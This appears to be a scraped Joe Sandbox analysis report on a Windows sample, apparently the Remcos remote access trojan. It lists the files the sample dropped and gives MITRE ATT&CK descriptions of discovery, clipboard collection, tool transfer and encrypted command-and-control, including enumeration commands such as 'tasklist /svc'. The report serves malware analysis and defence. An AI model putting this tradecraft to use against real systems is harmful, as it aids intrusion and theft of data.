Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remcos\logs.dat

C:\Users\Public\Libraries\Ntmftfld

C:\Users\Public\Libraries\Ntmftfld.PIF

C:\Users\Public\Libraries\PNO

C:\Users\Public\Libraries\dlftfmtN.cmd

C:\Users\Public\Ntmftfld.url

Windows Analysis Report
1m181Ru74o.exe

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre